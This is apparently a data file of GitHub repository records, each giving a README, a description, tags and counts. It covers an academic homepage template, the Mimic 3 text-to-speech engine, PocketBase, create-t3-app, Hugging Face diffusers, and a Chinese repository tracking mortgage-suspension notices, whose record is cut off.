[![](https://img.shields.io/github/stars/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/forks/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/issues/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io) [![](https://img.shields.io/github/license/RayeRen/acad-homepage.github.io)](https://github.com/RayeRen/acad-homepage.github.io/blob/main/LICENSE) | [ไธญๆ–‡ๆ–‡ๆกฃ](./docs/README-zh.md)

</div>

<p align="center">A Modern and Responsive Academic Personal Homepage</p>

<p align="center"> <br> <img src="docs/screenshot.png" width="100%"/> <br> </p>

Some examples:

- [Demo Page](https://rayeren.github.io/acad-homepage.github.io/)
- [Personal homepage of the author](https://rayeren.github.io/)

## Key Features

- **Automatically updated Google Scholar citations**: using the Google Scholar crawler and GitHub Actions, this REPO can update the author citations and publication citations automatically.
- **Google Analytics support**: you can track your homepage's traffic with a simple configuration.
- **Responsive**: this homepage automatically adjusts to different screen sizes and viewports.
- **Beautiful and simple design**: this homepage is beautiful and simple, which makes it well suited to an academic personal homepage.
- **SEO**: Search Engine Optimization (SEO) helps search engines easily find the information you publish on your homepage, then rank it against similar websites.

## Quick Start

1. Fork this REPO and rename it to `USERNAME.github.io`, where `USERNAME` is your GitHub username.
1. Configure the Google Scholar citation crawler:
   1. Find your Google Scholar ID in the URL of your Google Scholar page (e.g., https://scholar.google.com/citations?user=SCHOLAR_ID), where `SCHOLAR_ID` is your Google Scholar ID.
   1. Set the GOOGLE_SCHOLAR_ID variable to your Google Scholar ID in `Settings -> Secrets -> Actions -> New repository secret` of the REPO website, with `name=GOOGLE_SCHOLAR_ID` and `value=SCHOLAR_ID`.
   1. Click `Actions` on the REPO website and enable the workflows by clicking *"I understand my workflows, go ahead and enable them"*. This GitHub action generates the Google Scholar citation stats file `gs_data.json` in the `google-scholar-stats` branch of your REPO. The action is triggered whenever you update your main branch, and it also runs at 08:00 UTC every day.
1. Generate a favicon using [favicon-generator](https://redketchup.io/favicon-generator) and download all generated files to `REPO/images`.
1. Modify the configuration of your homepage in `_config.yml`:
   1. `title`: the title of your homepage
   1. `description`: the description of your homepage
   1. `repository`: USER_NAME/REPO_NAME
   1. `google_analytics_id` (optional): Google Analytics ID
   1. SEO-related keys (optional): get these keys from search engine consoles (e.g. Google, Bing and Baidu) and paste them here.
   1. `author`: the author information for this homepage, including other websites, email, city, and university.
   1. More configuration details are described in the comments.
1. Add your homepage content in `_pages/about.md`.
   1. You can use HTML+Markdown syntax, just as in Jekyll.
   1. You can use a `<span>` tag with class `show_paper_citations` and attribute `data` to display the citations of a paper. Set the data to the Google Scholar paper ID.
For example:

```html
<span class='show_paper_citations' data='DhtAFkwAAAAJ:ALROH1vI_8AC'></span>
```

> Q: How do I get the Google Scholar paper ID?
> A: Open your Google Scholar homepage and click the paper name. You can then read the paper ID from `citation_for_view=XXXX`, where `XXXX` is the required paper ID.

1. Your page will be published at `https://USERNAME.github.io`.

## Debug Locally

1. Clone your REPO locally using `git clone`.
1. Install the Jekyll build environment, including `Ruby`, `RubyGems`, `GCC` and `Make`, following [the installation guide](https://jekyllrb.com/docs/installation/#requirements).
1. Run `bash run_server.sh` to start the Jekyll livereload server.
1. Open http://127.0.0.1:4000 in your browser.
1. If you change the source code of the website, the livereload server will refresh it automatically.
1. When you finish modifying your homepage, `commit` your changes and `push` them to your remote REPO using `git`.

# Acknowledgements

- AcadHomepage incorporates Font Awesome, which is distributed under the terms of the SIL OFL 1.1 and MIT License.
- AcadHomepage is influenced by the GitHub repo [mmistakes/minimal-mistakes](https://github.com/mmistakes/minimal-mistakes), which is distributed under the MIT License.
- AcadHomepage is influenced by the GitHub repo [academicpages/academicpages.github.io](https://github.com/academicpages/academicpages.github.io), which is distributed under the MIT License.
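## Fetching the Crawled Citation Stats

As a rough illustration of what the workflow produces: the crawler commits a `gs_data.json` file to the `google-scholar-stats` branch of your REPO, so it can be fetched over GitHub's raw-content host. The URL pattern below follows GitHub's standard raw-file scheme, but the exact JSON layout is an assumption of this sketch; check your own branch for the actual structure.

```python
import json
import urllib.request

# Hypothetical example value -- replace with your own GitHub username.
username = "USERNAME"
url = (f"https://raw.githubusercontent.com/{username}/{username}.github.io"
       "/google-scholar-stats/gs_data.json")

with urllib.request.urlopen(url) as resp:
    data = json.load(resp)

# Peek at the crawled citation stats.
print(json.dumps(data, indent=2)[:500])
```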
AcadHomepage: A Modern and Responsive Academic Personal Homepage
null
0
1
42
41
17
2
1
MycroftAI/mimic3
# Mimic 3 ![mimic 3 mark 2](img/mimic3-hero.jpg) A fast and local neural text to speech system developed by [Mycroft](https://mycroft.ai/) for the [Mark II](https://mycroft.ai/product/mark-ii/). * [Available voices](https://github.com/MycroftAI/mimic3-voices) * [Documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3) * [How does it work?](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#how-it-works) ## Quickstart ### Mycroft TTS Plugin ``` sh # Install system packages sudo apt-get install libespeak-ng1 # Ensure that you're using the latest pip mycroft-pip install --upgrade pip # Install plugin mycroft-pip install mycroft-plugin-tts-mimic3[all] # Activate plugin mycroft-config set tts.module mimic3_tts_plug # Start mycroft mycroft-start all ``` See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#tts-plugin-for-mycroft-ai) for more details. ### Web Server ``` sh mkdir -p "${HOME}/.local/share/mycroft/mimic3" chmod a+rwx "${HOME}/.local/share/mycroft/mimic3" docker run \ -it \ -p 59125:59125 \ -v "${HOME}/.local/share/mycroft/mimic3:/home/mimic3/.local/share/mycroft/mimic3" \ 'mycroftai/mimic3' ``` Visit [http://localhost:59125](http://localhost:59125) or from another terminal: ``` sh curl -X POST --data 'Hello world.' --output - localhost:59125/api/tts | aplay ``` See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#web-server) for more details. ### Command-Line Tool ``` sh # Install system packages sudo apt-get install libespeak-ng1 # Create virtual environment python3 -m venv .venv source .venv/bin/activate pip3 install --upgrade pip pip3 install mycroft-mimic3-tts[all] ``` Now you can run: ``` sh mimic3 'Hello world.' | aplay ``` Use `mimic3-server` and `mimic3 --remote ...` for repeated usage (much faster). See [documentation](https://mycroft-ai.gitbook.io/docs/mycroft-technologies/mimic-tts/coming-soon-mimic-3#command-line-interface) for more details. --- ## License Mimic 3 is available under the [AGPL v3 license](LICENSE)
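### Example: calling the web server from Python

For a quick check that the web server from the Quickstart is running, the sketch below mirrors the `curl` example: it POSTs plain text to `/api/tts` on the default `localhost:59125` address and saves the returned audio. It assumes the third-party `requests` package (`pip install requests`) and that the response body is playable WAV audio, as in the `aplay` example.

```python
import requests

resp = requests.post(
    "http://localhost:59125/api/tts",
    data="Hello world.".encode("utf-8"),
    timeout=60,
)
resp.raise_for_status()

with open("hello.wav", "wb") as f:
    f.write(resp.content)
print(f"wrote {len(resp.content)} bytes to hello.wav")
```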
A fast local neural text to speech engine for Mycroft
null
3
10
9
248
39
1
0
pocketbase/pocketbase
<p align="center"> <a href="https://pocketbase.io" target="_blank" rel="noopener"> <img src="https://i.imgur.com/5qimnm5.png" alt="PocketBase - open source backend in 1 file" /> </a> </p>

<p align="center"> <a href="https://github.com/pocketbase/pocketbase/actions/workflows/release.yaml" target="_blank" rel="noopener"><img src="https://github.com/pocketbase/pocketbase/actions/workflows/release.yaml/badge.svg" alt="build" /></a> <a href="https://github.com/pocketbase/pocketbase/releases" target="_blank" rel="noopener"><img src="https://img.shields.io/github/release/pocketbase/pocketbase.svg" alt="Latest releases" /></a> <a href="https://pkg.go.dev/github.com/pocketbase/pocketbase" target="_blank" rel="noopener"><img src="https://godoc.org/github.com/pocketbase/pocketbase?status.svg" alt="Go package documentation" /></a> </p>

[PocketBase](https://pocketbase.io) is an open source Go backend, consisting of:

- embedded database (_SQLite_) with **realtime subscriptions**
- built-in **files and users management**
- convenient **Admin dashboard UI**
- and simple **REST-ish API**

**For documentation and examples, please visit https://pocketbase.io/docs.**

> [!WARNING]
> Please keep in mind that PocketBase is still under active development
> and therefore full backward compatibility is not guaranteed before reaching v1.0.0.

## API SDK clients

The easiest way to interact with the API is to use one of the official SDK clients:

- **JavaScript - [pocketbase/js-sdk](https://github.com/pocketbase/js-sdk)** (_browser and node_)
- **Dart - [pocketbase/dart-sdk](https://github.com/pocketbase/dart-sdk)** (_web, mobile, desktop_)

## Overview

### Use as standalone app

You can download the prebuilt executable for your platform from the [Releases page](https://github.com/pocketbase/pocketbase/releases). Once downloaded, extract the archive and run `./pocketbase serve` in the extracted directory.

The prebuilt executables are based on the [`examples/base/main.go` file](https://github.com/pocketbase/pocketbase/blob/master/examples/base/main.go) and come with the JS VM plugin enabled by default, which allows you to extend PocketBase with JavaScript (_for more details please refer to [Extend with JavaScript](https://pocketbase.io/docs/js-overview/)_).

### Use as a Go framework/toolkit

PocketBase is distributed as a regular Go library package which allows you to build your own custom, app-specific business logic and still have a single portable executable at the end. Here is a minimal example:

0. [Install Go 1.21+](https://go.dev/doc/install) (_if you haven't already_)

1. Create a new project directory with the following `main.go` file inside it:

```go
package main

import (
    "log"
    "net/http"

    "github.com/labstack/echo/v5"
    "github.com/pocketbase/pocketbase"
    "github.com/pocketbase/pocketbase/apis"
    "github.com/pocketbase/pocketbase/core"
)

func main() {
    app := pocketbase.New()

    app.OnBeforeServe().Add(func(e *core.ServeEvent) error {
        // add new "GET /hello" route to the app router (echo)
        e.Router.AddRoute(echo.Route{
            Method: http.MethodGet,
            Path:   "/hello",
            Handler: func(c echo.Context) error {
                return c.String(200, "Hello world!")
            },
            Middlewares: []echo.MiddlewareFunc{
                apis.ActivityLogger(app),
            },
        })

        return nil
    })

    if err := app.Start(); err != nil {
        log.Fatal(err)
    }
}
```

2. To init the dependencies, run `go mod init myapp && go mod tidy`.
3. To start the application, run `go run main.go serve`.
4. To build a statically linked executable, you can run `CGO_ENABLED=0 go build` and then start the created executable with `./myapp serve`.

> [!NOTE]
> PocketBase embeds SQLite, but doesn't require CGO.
>
> If CGO is enabled (aka. `CGO_ENABLED=1`), it will use the [mattn/go-sqlite3](https://pkg.go.dev/github.com/mattn/go-sqlite3) driver, otherwise - [modernc.org/sqlite](https://pkg.go.dev/modernc.org/sqlite).
> Enable CGO only if you really need to squeeze the read/write query performance at the expense of complicating cross compilation.

_For more details please refer to [Extend with Go](https://pocketbase.io/docs/go-overview/)._

### Building and running the repo main.go example

To build the minimal standalone executable, like the prebuilt ones on the releases page, you can simply run `go build` inside the `examples/base` directory:

0. [Install Go 1.21+](https://go.dev/doc/install) (_if you haven't already_)
1. Clone/download the repo
2. Navigate to `examples/base`
3. Run `GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go build` (_https://go.dev/doc/install/source#environment_)
4. Start the created executable by running `./base serve`.

Note that the build targets currently supported by the pure Go SQLite driver are:

```
darwin  amd64
darwin  arm64
freebsd amd64
freebsd arm64
linux   386
linux   amd64
linux   arm
linux   arm64
linux   ppc64le
linux   riscv64
linux   s390x
windows amd64
windows arm64
```

### Testing

PocketBase comes with a mixed bag of unit and integration tests. To run them, use the standard `go test` command:

```sh
go test ./...
```

Check also the [Testing guide](http://pocketbase.io/docs/testing) to learn how to write your own custom application tests.

## Security

If you discover a security vulnerability within PocketBase, please send an e-mail to **support at pocketbase.io**. All reports will be promptly addressed, and you'll be credited accordingly.

## Contributing

PocketBase is a free and open source project licensed under the [MIT License](LICENSE.md). You are free to do whatever you want with it, even offering it as a paid service.

You can help continue its development by:

- [Contribute to the source code](CONTRIBUTING.md)
- [Suggest new features and report issues](https://github.com/pocketbase/pocketbase/issues)

PRs for new OAuth2 providers, bug fixes, code optimizations and documentation improvements are more than welcome.

But please refrain from creating PRs for _new features_ without first discussing the implementation details. PocketBase has a [roadmap](https://github.com/orgs/pocketbase/projects/2) and I try to work on issues in a specific order; such PRs often come out of nowhere and skew the initial planning with tedious back-and-forth communication. Don't get upset if I close your PR, even if it is well executed and tested. This doesn't mean that it will never be merged. Later we can always refer to it and/or take pieces of your implementation when the time comes to work on the issue (don't worry, you'll be credited in the release notes).
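## Smoke-testing the custom route

A minimal sketch (not part of PocketBase) for exercising the `GET /hello` route registered in the Go example above. It assumes the app was started with `go run main.go serve` and is listening on PocketBase's usual default address `127.0.0.1:8090`; adjust the URL if your setup differs.

```python
import urllib.request

# Hit the custom route added via app.OnBeforeServe() in the example above.
with urllib.request.urlopen("http://127.0.0.1:8090/hello") as resp:
    print(resp.status, resp.read().decode())  # expected: 200 Hello world!
```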
Open Source realtime backend in 1 file
authentication,backend,realtime,golang
138
48
199
1,397
40
3
1
t3-oss/create-t3-app
./cli/README.md
The best way to start a full-stack, typesafe Next.js app
cli,next-auth,nextjs,npx,tailwindcss,trpc,typescript,prisma,t3,t3-stack
128
334
1,276
1,288
42
8
7
huggingface/diffusers
<!--- Copyright 2022 - The HuggingFace Team. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <p align="center"> <br> <img src="https://raw.githubusercontent.com/huggingface/diffusers/main/docs/source/en/imgs/diffusers_library.jpg" width="400"/> <br> <p> <p align="center"> <a href="https://github.com/huggingface/diffusers/blob/main/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/huggingface/datasets.svg?color=blue"></a> <a href="https://github.com/huggingface/diffusers/releases"><img alt="GitHub release" src="https://img.shields.io/github/release/huggingface/diffusers.svg"></a> <a href="https://pepy.tech/project/diffusers"><img alt="GitHub release" src="https://static.pepy.tech/badge/diffusers/month"></a> <a href="CODE_OF_CONDUCT.md"><img alt="Contributor Covenant" src="https://img.shields.io/badge/Contributor%20Covenant-2.1-4baaaa.svg"></a> <a href="https://twitter.com/diffuserslib"><img alt="X account" src="https://img.shields.io/twitter/url/https/twitter.com/diffuserslib.svg?style=social&label=Follow%20%40diffuserslib"></a> </p> ๐Ÿค— Diffusers is the go-to library for state-of-the-art pretrained diffusion models for generating images, audio, and even 3D structures of molecules. Whether you're looking for a simple inference solution or training your own diffusion models, ๐Ÿค— Diffusers is a modular toolbox that supports both. Our library is designed with a focus on [usability over performance](https://huggingface.co/docs/diffusers/conceptual/philosophy#usability-over-performance), [simple over easy](https://huggingface.co/docs/diffusers/conceptual/philosophy#simple-over-easy), and [customizability over abstractions](https://huggingface.co/docs/diffusers/conceptual/philosophy#tweakable-contributorfriendly-over-abstraction). ๐Ÿค— Diffusers offers three core components: - State-of-the-art [diffusion pipelines](https://huggingface.co/docs/diffusers/api/pipelines/overview) that can be run in inference with just a few lines of code. - Interchangeable noise [schedulers](https://huggingface.co/docs/diffusers/api/schedulers/overview) for different diffusion speeds and output quality. - Pretrained [models](https://huggingface.co/docs/diffusers/api/models/overview) that can be used as building blocks, and combined with schedulers, for creating your own end-to-end diffusion systems. ## Installation We recommend installing ๐Ÿค— Diffusers in a virtual environment from PyPI or Conda. For more details about installing [PyTorch](https://pytorch.org/get-started/locally/) and [Flax](https://flax.readthedocs.io/en/latest/#installation), please refer to their official documentation. 
### PyTorch

With `pip` (official package):

```bash
pip install --upgrade diffusers[torch]
```

With `conda` (maintained by the community):

```sh
conda install -c conda-forge diffusers
```

### Flax

With `pip` (official package):

```bash
pip install --upgrade diffusers[flax]
```

### Apple Silicon (M1/M2) support

Please refer to the [How to use Stable Diffusion in Apple Silicon](https://huggingface.co/docs/diffusers/optimization/mps) guide.

## Quickstart

Generating outputs is super easy with 🤗 Diffusers. To generate an image from text, use the `from_pretrained` method to load any pretrained diffusion model (browse the [Hub](https://huggingface.co/models?library=diffusers&sort=downloads) for 25,000+ checkpoints):

```python
from diffusers import DiffusionPipeline
import torch

pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16)
pipeline.to("cuda")
pipeline("An image of a squirrel in Picasso style").images[0]
```

You can also dig into the models and schedulers toolbox to build your own diffusion system:

```python
from diffusers import DDPMScheduler, UNet2DModel
from PIL import Image
import torch

scheduler = DDPMScheduler.from_pretrained("google/ddpm-cat-256")
model = UNet2DModel.from_pretrained("google/ddpm-cat-256").to("cuda")
scheduler.set_timesteps(50)

sample_size = model.config.sample_size
noise = torch.randn((1, 3, sample_size, sample_size), device="cuda")
input = noise

for t in scheduler.timesteps:
    with torch.no_grad():
        noisy_residual = model(input, t).sample
        prev_noisy_sample = scheduler.step(noisy_residual, t, input).prev_sample
        input = prev_noisy_sample

image = (input / 2 + 0.5).clamp(0, 1)
image = image.cpu().permute(0, 2, 3, 1).numpy()[0]
image = Image.fromarray((image * 255).round().astype("uint8"))
image
```

Check out the [Quickstart](https://huggingface.co/docs/diffusers/quicktour) to launch your diffusion journey today!

## How to navigate the documentation

| **Documentation** | **What can I learn?** |
|---|---|
| [Tutorial](https://huggingface.co/docs/diffusers/tutorials/tutorial_overview) | A basic crash course for learning how to use the library's most important features like using models and schedulers to build your own diffusion system, and training your own diffusion model. |
| [Loading](https://huggingface.co/docs/diffusers/using-diffusers/loading_overview) | Guides for how to load and configure all the components (pipelines, models, and schedulers) of the library, as well as how to use different schedulers. |
| [Pipelines for inference](https://huggingface.co/docs/diffusers/using-diffusers/pipeline_overview) | Guides for how to use pipelines for different inference tasks, batched generation, controlling generated outputs and randomness, and how to contribute a pipeline to the library. |
| [Optimization](https://huggingface.co/docs/diffusers/optimization/opt_overview) | Guides for how to optimize your diffusion model to run faster and consume less memory. |
| [Training](https://huggingface.co/docs/diffusers/training/overview) | Guides for how to train a diffusion model for different tasks with different training techniques. |

## Contribution

We ❤️ contributions from the open-source community!
If you want to contribute to this library, please check out our [Contribution guide](https://github.com/huggingface/diffusers/blob/main/CONTRIBUTING.md). You can look out for [issues](https://github.com/huggingface/diffusers/issues) you'd like to tackle to contribute to the library. - See [Good first issues](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22) for general opportunities to contribute - See [New model/pipeline](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22New+pipeline%2Fmodel%22) to contribute exciting new diffusion models / diffusion pipelines - See [New scheduler](https://github.com/huggingface/diffusers/issues?q=is%3Aopen+is%3Aissue+label%3A%22New+scheduler%22) Also, say ๐Ÿ‘‹ in our public Discord channel <a href="https://discord.gg/G7tWnz98XR"><img alt="Join us on Discord" src="https://img.shields.io/discord/823813159592001537?color=5865F2&logo=discord&logoColor=white"></a>. We discuss the hottest trends about diffusion models, help each other with contributions, personal projects or just hang out โ˜•. ## Popular Tasks & Pipelines <table> <tr> <th>Task</th> <th>Pipeline</th> <th>๐Ÿค— Hub</th> </tr> <tr style="border-top: 2px solid black"> <td>Unconditional Image Generation</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/ddpm"> DDPM </a></td> <td><a href="https://huggingface.co/google/ddpm-ema-church-256"> google/ddpm-ema-church-256 </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/text2img">Stable Diffusion Text-to-Image</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-v1-5"> runwayml/stable-diffusion-v1-5 </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/unclip">unCLIP</a></td> <td><a href="https://huggingface.co/kakaobrain/karlo-v1-alpha"> kakaobrain/karlo-v1-alpha </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/deepfloyd_if">DeepFloyd IF</a></td> <td><a href="https://huggingface.co/DeepFloyd/IF-I-XL-v1.0"> DeepFloyd/IF-I-XL-v1.0 </a></td> </tr> <tr> <td>Text-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/kandinsky">Kandinsky</a></td> <td><a href="https://huggingface.co/kandinsky-community/kandinsky-2-2-decoder"> kandinsky-community/kandinsky-2-2-decoder </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/controlnet">ControlNet</a></td> <td><a href="https://huggingface.co/lllyasviel/sd-controlnet-canny"> lllyasviel/sd-controlnet-canny </a></td> </tr> <tr> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/pix2pix">InstructPix2Pix</a></td> <td><a href="https://huggingface.co/timbrooks/instruct-pix2pix"> timbrooks/instruct-pix2pix </a></td> </tr> <tr> <td>Text-guided Image-to-Image</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/img2img">Stable Diffusion Image-to-Image</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-v1-5"> runwayml/stable-diffusion-v1-5 </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Text-guided Image Inpainting</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/inpaint">Stable Diffusion 
Inpainting</a></td> <td><a href="https://huggingface.co/runwayml/stable-diffusion-inpainting"> runwayml/stable-diffusion-inpainting </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Image Variation</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/image_variation">Stable Diffusion Image Variation</a></td> <td><a href="https://huggingface.co/lambdalabs/sd-image-variations-diffusers"> lambdalabs/sd-image-variations-diffusers </a></td> </tr> <tr style="border-top: 2px solid black"> <td>Super Resolution</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/upscale">Stable Diffusion Upscale</a></td> <td><a href="https://huggingface.co/stabilityai/stable-diffusion-x4-upscaler"> stabilityai/stable-diffusion-x4-upscaler </a></td> </tr> <tr> <td>Super Resolution</td> <td><a href="https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion/latent_upscale">Stable Diffusion Latent Upscale</a></td> <td><a href="https://huggingface.co/stabilityai/sd-x2-latent-upscaler"> stabilityai/sd-x2-latent-upscaler </a></td> </tr> </table>

## Popular libraries using 🧨 Diffusers

- https://github.com/microsoft/TaskMatrix
- https://github.com/invoke-ai/InvokeAI
- https://github.com/apple/ml-stable-diffusion
- https://github.com/Sanster/lama-cleaner
- https://github.com/IDEA-Research/Grounded-Segment-Anything
- https://github.com/ashawkey/stable-dreamfusion
- https://github.com/deep-floyd/IF
- https://github.com/bentoml/BentoML
- https://github.com/bmaltais/kohya_ss
- and 11,000+ other amazing GitHub repositories 💪

Thank you for using us ❤️.

## Credits

This library concretizes previous work by many different authors and would not have been possible without their great research and implementations. We'd like to thank, in particular, the following implementations which have helped us in our development and without which the API could not have been as polished today:

- @CompVis' latent diffusion models library, available [here](https://github.com/CompVis/latent-diffusion)
- @hojonathanho's original DDPM implementation, available [here](https://github.com/hojonathanho/diffusion), as well as the extremely useful translation into PyTorch by @pesser, available [here](https://github.com/pesser/pytorch_diffusion)
- @ermongroup's DDIM implementation, available [here](https://github.com/ermongroup/ddim)
- @yang-song's Score-VE and Score-VP implementations, available [here](https://github.com/yang-song/score_sde_pytorch)

We also want to thank @heejkoo for the very helpful overview of papers, code and resources on diffusion models, available [here](https://github.com/heejkoo/Awesome-Diffusion-Models), as well as @crowsonkb and @rromb for useful discussions and insights.

## Citation

```bibtex
@misc{von-platen-etal-2022-diffusers,
  author = {Patrick von Platen and Suraj Patil and Anton Lozhkov and Pedro Cuenca and Nathan Lambert and Kashif Rasul and Mishig Davaadorj and Dhruv Nair and Sayak Paul and William Berman and Yiyi Xu and Steven Liu and Thomas Wolf},
  title = {Diffusers: State-of-the-art diffusion models},
  year = {2022},
  publisher = {GitHub},
  journal = {GitHub repository},
  howpublished = {\url{https://github.com/huggingface/diffusers}}
}
```
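## Swapping schedulers

A short illustration of the "interchangeable schedulers" idea from the components list above: load a pipeline as in the Quickstart, then rebuild its scheduler from the existing config. `DPMSolverMultistepScheduler` is used here as the substitute, but any compatible scheduler class works the same way; the step count below is just a typical choice for this scheduler family, not a prescribed value.

```python
import torch
from diffusers import DiffusionPipeline, DPMSolverMultistepScheduler

pipeline = DiffusionPipeline.from_pretrained(
    "runwayml/stable-diffusion-v1-5", torch_dtype=torch.float16
)
# Rebuild the scheduler from the pipeline's own config, keeping it compatible.
pipeline.scheduler = DPMSolverMultistepScheduler.from_config(pipeline.scheduler.config)
pipeline.to("cuda")

# DPM-Solver++ style schedulers typically need fewer inference steps.
image = pipeline(
    "An image of a squirrel in Picasso style", num_inference_steps=25
).images[0]
```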
๐Ÿค— Diffusers: State-of-the-art diffusion models for image and audio generation in PyTorch and FLAX.
deep-learning,diffusion,image-generation,pytorch,score-based-generative-modeling,image2image,text2image,stable-diffusion,stable-diffusion-diffusers,hacktoberfest
72
857
4,369
4,246
395
360
24
WeNeedHome/SummaryOfLoanSuspension
# ๅ…จๅ›ฝๅ„็œๅธ‚็ƒ‚ๅฐพๆฅผๅœ่ดทๆ–ญไพ›้€š็Ÿฅๆฑ‡ๆ€ป ## ๆ•ฐๆฎๆฅๆบ็ปŸ่ฎกไปฅๅŠๅ‘่ตทไบบ๏ผš ๅทฒ่ขซๅฐ็ฆ *้žไธ“ไธš็ฒพ็กฎๆ•ฐๆฎ๏ผŒไป…ไพ›ๅ‚่€ƒ๏ผŒไธŽๆ•ฐๆฎๆจก็ณŠๅˆ†ๆž* *ๆ•ฐๆฎๅผ€ๆ”พ่ฝฌ่ฝฝๅผ•็”จ๏ผŒไฝ†่ฏทๆณจๆ˜Žๅ‡บๅค„๏ผŒ้žๅธธๆ„Ÿ่ฐข๏ผ* *่ฟ™้‡Œไธๅšไปปไฝ•้žๆ•ฐๆฎๆ€ง่ดจ็ญ‰ๅ…ถไป–ไธ€็ณปๅˆ—่ฎจ่ฎบ๏ผŒๅชๆ˜ฏ็ปŸ่ฎกไธ€ไธชๆ•ฐๆฎ๏ผŒๆœ‰้”™ๅฐฑ็บ ๆ”น๏ผŒๆ— ๅ…ถไป–ไปปไฝ•ๅซไน‰๏ผŒๅˆซ็š„่ฏทๅ‹ฟๅคš่จ€๏ผ็ฆๆญขๆ”ฟๆฒปๆ•ๆ„Ÿ่ฏ้ข˜๏ผ* *่ฆ็›ธไฟกๅ…š๏ผŒ็›ธไฟกๆ”ฟๅบœใ€‚ๅ…šๅ’Œๆ”ฟๅบœไธ€ๅฎšไผš็ป™ไบบๆฐ‘็พคไผ—ไธ€ไธชๆปกๆ„็š„ไบคไปฃ๏ผŒ่ฟ™้‡Œไป…ไฝœๆ•ฐๆฎ็ปŸ่ฎก๏ผŒๅˆ‡ๅ‹ฟๆœ‰่ฟ‡ๆฟ€่จ€่ฎบ๏ผ* [--> ๆฏ›ไธปๅธญๅœจ 1962 ๅนดไธƒๅƒไบบๅคงไผšไธŠ็š„่ฎฒ่ฏ](https://www.marxists.org/chinese/maozedong/1968/5-016.htm) [--> ไบ’ๅธฎไบ’ๅŠฉ็•™่จ€่ฎจ่ฎบๅŒบ=>](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions) ๏ผˆ้ตๅฎˆ่ง„ๅˆ™ๆ‹’็ปๆ”ฟๆฒปๆ•ๆ„Ÿ๏ผŒไธ็„ถไผšๅ†ๆฌกๅ…ณ้—ญ discussionใ€‚๏ผ‰ [--> ็›ธๅ…ณๆณ•ๅพ‹ไธŽๅฎกๅˆคๆกˆไพ‹ๆ”ฏๆŒ](็›ธๅ…ณๆณ•ๅพ‹ไธŽๅฎกๅˆคๆกˆไพ‹ๆ”ฏๆŒ.md) ## ้กน็›ฎๅๅŒ ### ่ฎกๅˆ’ [--> TODO](./TODO.md) ### ๆไบค 1. [--> 1. ๆ–ฐๆ‰‹่ฏท็œ‹๏ผšๅฆ‚ไฝ•ๆไบค้กน็›ฎไฟกๆฏ](PR-instruction.md) 2. [--> 2. ๆทปๅŠ ่ฏท็œ‹๏ผšๆ–ฐๅขžๅœ่ดท้กน็›ฎ่ง„่Œƒ](CONTRIBUTING.md) 3. [--> 3. ๅ†ฒ็ช่ฏท็œ‹๏ผšๅฆ‚ไฝ•ไฟฎๆญฃๆไบคๅ†ฒ็ช](PR-resolving-conflicts.md) ๅ…ถไธญ๏ผŒๆไบคไน‹ๅ‰่ฏท็กฎไฟ้ชŒ่ฏ่ƒฝ่ฟ‡๏ผš ```shell sh ./run-validate.sh ``` ### ๅผ€ๅ‘ - [--> ๅŽ็ซฏ](development/backend/README.md) - [--> ๅ‰็ซฏ](development/frontend/README.md) 1. :sparkles: ๆœฌ้กน็›ฎๅทฒ้›†ๆˆCI๏ผŒๅฐ†่‡ชๅŠจๆ ธ้ชŒๆ•ฐๆฎ็š„็ปŸ่ฎกๅ‡†็กฎๆ€ง๏ผŒๅ…ทไฝ“่ง๏ผš[backend-nodejs](./development/backend/nodejs/README.md) 2. :rocket: 20220719 ๅทฒๅฎž็Žฐๅผ€ๅ‘ๅ•†ๆ•ฐๆฎๆŠ“ๅ–๏ผŒไฝ†่ฟ˜้œ€่ฆๆ›ดๅคš็š„ๅ•ๅ…ƒๆต‹่ฏ•ไธŽๆ ทๆœฌๆต‹่ฏ•๏ผŒๅ…ทไฝ“่ง๏ผš[็ˆฌ่™ซๅผ€ๅ‘่€…ๆ€ฅ้›†ไปค๐Ÿš€ #950](https://github.com/WeNeedHome/SummaryOfLoanSuspension/discussions/950) 3. :zap: 20220720 